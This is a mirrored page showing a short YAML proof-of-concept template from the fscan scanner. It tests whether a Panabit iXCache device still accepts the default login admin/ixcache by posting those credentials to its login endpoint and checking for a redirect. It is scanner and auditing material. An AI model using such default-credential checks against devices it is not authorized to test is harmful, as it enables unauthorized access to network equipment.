mirror of
https://github.com/shadow1ng/fscan.git
synced 2025-07-14 05:12:36 +08:00
11 lines
364 B
YAML
11 lines
364 B
YAML
name: poc-yaml-panabit-ixcache-default-password
|
|
rules:
|
|
- method: POST
|
|
path: /login/userverify.cgi
|
|
body: username=admin&password=ixcache
|
|
expression: |
|
|
response.status == 200 && response.body.bcontains(b"URL=/cgi-bin/monitor.cgi")
|
|
detail:
|
|
author: B1anda0(https://github.com/B1anda0)
|
|
links:
|
|
- http://forum.panabit.com/thread-10830-1-1.html |